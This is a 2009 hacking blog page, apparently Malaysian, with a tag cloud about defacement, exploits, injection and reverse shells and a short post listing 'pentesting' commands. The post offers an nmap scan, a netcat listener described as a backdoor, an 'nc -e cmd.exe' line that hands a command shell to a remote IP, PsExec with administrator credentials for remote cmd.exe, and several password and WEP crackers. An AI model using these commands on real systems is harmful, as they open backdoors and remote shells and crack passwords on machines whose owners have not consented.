tags
alert
(1)
art
(1)
asteriks
(1)
bof
(1)
browser
(1)
buffer overflow
(1)
computer
(1)
connect
(1)
cookie
(1)
crack
(2)
db_connect
(1)
db_driver
(1)
db_load
(1)
ddos
(1)
debugging
(1)
defaced
(4)
Deprecated plugin
(1)
document
(1)
dos
(1)
errors
(1)
expl
(2)
exploit
(2)
game over
(1)
geek
(1)
geeky
(1)
generd
(1)
gov.my
(1)
GSM
(1)
hack
(2)
hacker
(1)
hacking
(1)
hacks
(2)
hitb
(1)
hobbyist
(1)
ihack
(1)
index
(1)
inject
(1)
injection
(1)
java
(1)
javascript
(1)
lfi
(2)
malaysia
(1)
meta
(1)
metasploit
(1)
microwave
(1)
mysql
(1)
nerd
(1)
nerdy
(1)
netstat
(1)
nmap
(1)
outbout
(1)
owned
(1)
packet
(2)
pass
(1)
password
(1)
pdos
(1)
psexec
(1)
pub
(1)
pwn
(1)
retrive
(1)
reveal
(1)
reverse
(1)
reverse shell
(1)
rfi
(2)
root
(1)
sarawak
(1)
security
(1)
SEH
(2)
session
(1)
shellcode
(1)
sibu
(1)
sniffing
(1)
sql
(1)
sqli
(1)
stack overflow
(1)
turk
(1)
user
(1)
vnc
(1)
web
(1)
which one
(1)
wideband
(1)
you
(1)
5pl017
Inj3ct0r.com
http://sec.jetlib.com/
Defacement-art-Underground-propaganda
Wireless hack,Wifi hack & security
Tuesday, December 22, 2009
Oldschool but still useable...
Preparation to pentesting.
more infos, read these
Basic tools and examples
Portscanner
Nmap -sS -vv -P0 -n -p 21,80,443 // probing for open port
Backdoor
Nc.exe -l -p 80 // execute a backdoor and listen to port 80 for outbound connection
Nc.exe -v -e cmd.exe <the backdoored ip address > 80 // connect to backdoor
PSexec tools useful for remote access
PSexec \\ -u administrator -p password -s cmd.exe
VNC same as PSexec, it's stress on GUI
A password cracker tools
Brutus Password cracker
THC password cracker
AircrackNG WIFI - WEP cracker
Subscribe to:
Post Comments (Atom)
0 Comments:
Post a Comment